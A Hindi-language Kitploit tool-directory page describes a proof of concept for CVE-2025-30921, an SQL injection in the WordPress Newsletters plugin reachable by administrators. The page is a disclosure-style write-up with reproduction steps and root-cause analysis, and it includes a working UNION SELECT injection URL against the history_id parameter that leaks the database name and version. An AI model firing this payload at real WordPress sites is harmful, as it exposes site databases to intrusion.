Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-30921 — PoC of CVE-2025-30921 | Kitploit
उपकरण/GitHubGitHub/dottak/cve-2025-30921
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubdottak/cve-2025-30921

CVE-2025-30921

PoC of CVE-2025-30921

रिपॉजिटरी देखें
111 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-30921

1️⃣ घटक प्रकार

वर्डप्रेस प्लगइन

2️⃣ घटक विवरण

Component name Newsletters

Vulnerable version <= 4.9.9.7

Component slug newsletters-lite

Component link https://wordpress.org/plugins/newsletters-lite/

3️⃣ OWASP 2017: शीर्ष 10

Vulnerability class A3: Injection

Vulnerability type SQL Injection

4️⃣ पूर्व-आवश्यकता

व्यवस्थापक

5️⃣ भेद्यता विवरण

👉 संक्षिप्त विवरण

Newsletters प्लगइन संस्करण 4.9.9.7 या उससे निचले संस्करण के डैशबोर्ड (/wp-admin/admin.php?page=newsletters) में सांख्यिकी अवलोकन चार्ट देखते समय, URL पैरामीटरों के अपर्याप्त इनपुट सत्यापन और एस्केप प्रसंस्करण के कारण SQL इंजेक्शन भेद्यता उत्पन्न होती है।

इस भेद्यता के माध्यम से, व्यवस्थापक विशेषाधिकारों वाला एक हमलावर लक्ष्य साइट से डेटाबेस जानकारी निकालने के लिए इसका शोषण कर सकता है।

👉 पुनरुत्पादन कैसे करें (PoC)

  1. Newsletters प्लगइन संस्करण 4.9.9.7 या उससे निचले संस्करण के साथ एक WordPress साइट तैयार करें।

  2. Newsletters प्लगइन डैशबोर्ड मेनू (/wp-admin/admin.php?page=newsletters) पर जाएँ।

    image

  3. ब्राउज़र डेवलपर टूल का उपयोग करके, 'Elements' टैब में action=wpmlwelcomestats&security= खोजें और security का मान जाँचें। उदाहरण के लिए, यदि खोज परिणाम नीचे दिखाए अनुसार दिखाई देता है, तो 22b1ac0de6 नोट करें।

    root@kitploit:~
    // ...
    
    jQuery.getJSON(newsletters_ajaxurl + 'action=wpmlwelcomestats&security=22b1ac0de6', ajaxdata, function(json) {
    
    // ...
    

    image

  4. नीचे दिए गए URL पथ के <SECURITY VALUE> अनुभाग में नोट किए गए security मान दर्ज करें और उस URL पर अनुरोध भेजें

    root@kitploit:~
    http://localhost:8080/wp-admin/admin-ajax.php?action=wpmlwelcomestats&security=<SECURITY VALUE>&type=years&chart=bar&from=2024-12-31&to=2024-12-31&history_id=FOO%27+UNION+SELECT+(CONCAT((DATABASE()),%22-%22,(@@VERSION))),NULL+LIMIT+1,2+%23
    

👉 अतिरिक्त जानकारी (वैकल्पिक)

[भेद्यता का मूल कारण]

उपरोक्त PoC में SQL इंजेक्शन भेद्यता उत्पन्न करने वाले URL का अनुरोध करते समय, /wp-content/plugins/newsletters-lite/wp-mailinglist-plugin.php फ़ाइल के अंदर ajax_welcomestats फ़ंक्शन कॉल किया जाता है।

इस बिंदु पर, अनुरोध पैरामीटर history_id को SQL क्वेरी स्ट्रिंग में एक शर्त खंड के रूप में सीधे संदर्भित किया जाता है और चर $history_condition के रूप में आरंभ किया जाता है। इस चर को बिना किसी एस्केप प्रसंस्करण के डेटाबेस क्वेरी में पारित किया जाता है।

image

इसलिए, चूँकि URL पैरामीटर history_id में दर्ज किए गए मानों के लिए कोई सत्यापन या एस्केप प्रसंस्करण नहीं है, SQL इंजेक्शन भेद्यता उत्पन्न होती है। (ध्यान दें कि URL पैरामीटर from और to भी अपर्याप्त इनपुट सत्यापन और एस्केप प्रसंस्करण के कारण SQL इंजेक्शन हमलों के लिए असुरक्षित हैं।)

6️⃣ शोषण डेमो

video

7️⃣ संदर्भ

  • https://nvd.nist.gov/vuln/detail/CVE-2025-30921
टूल डाउनलोड करें

URL पैरामीटरों में से, history_id में SQL इंजेक्शन पेलोड होता है, जो डेटाबेस नाम (DATABASE()) और संस्करण (@@VERSION) को क्वेरी करने की अनुमति देता है। उदाहरण के लिए, जब security मान 22b1ac0de6 है, तो निम्नलिखित URL तक पहुँचें।

http://localhost:8080/wp-admin/admin-ajax.php?action=wpmlwelcomestats&security=22b1ac0de6&type=years&chart=bar&from=2024-12-31&to=2024-12-31&history_id=FOO%27+UNION+SELECT+(CONCAT((DATABASE()),%22-%22,(@@VERSION))),NULL+LIMIT+1,2+%23

  • URL अनुरोध प्रतिक्रिया की जाँच करते समय, आप पुष्टि कर सकते हैं कि history_id पैरामीटर के माध्यम से SQL इंजेक्शन भेद्यता के कारण डेटाबेस का नाम और संस्करण जानकारी उजागर हो गई है।

    image